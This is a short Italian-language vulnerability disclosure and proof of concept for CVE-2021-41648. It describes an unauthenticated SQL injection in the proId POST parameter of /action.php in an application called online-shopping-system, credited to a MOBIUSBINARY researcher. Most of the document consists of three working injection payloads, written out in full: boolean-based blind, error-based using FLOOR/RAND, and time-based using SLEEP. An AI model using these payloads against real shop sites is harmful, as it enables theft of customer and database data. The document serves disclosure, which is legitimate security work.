
Exploit proof-of-concept per SQL injection non autenticata in online-shopping-system tramite il parametro proId, che consente l'estrazione di dati dal database MySQL.
CVE-2021-41648 SQL Injection in online-shopping-system
online-shopping-system è vulnerabile ad attacchi SQL Injection non autenticati di tipo error/boolean-based blind ed error-based.
Il parametro proId della pagina /action.php non sanitizza l'input dell'utente; un attaccante può estrarre dati sensibili dal database MySQL sottostante.
URL: /action.php
PARAMETRO: proId
Parametro: proId (POST)
Tipo: boolean-based blind
Titolo: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1
Tipo: error-based
Titolo: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1
Tipo: time-based blind
Titolo: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

Jason Colyvas
MOBIUSBINARY
21 settembre 2021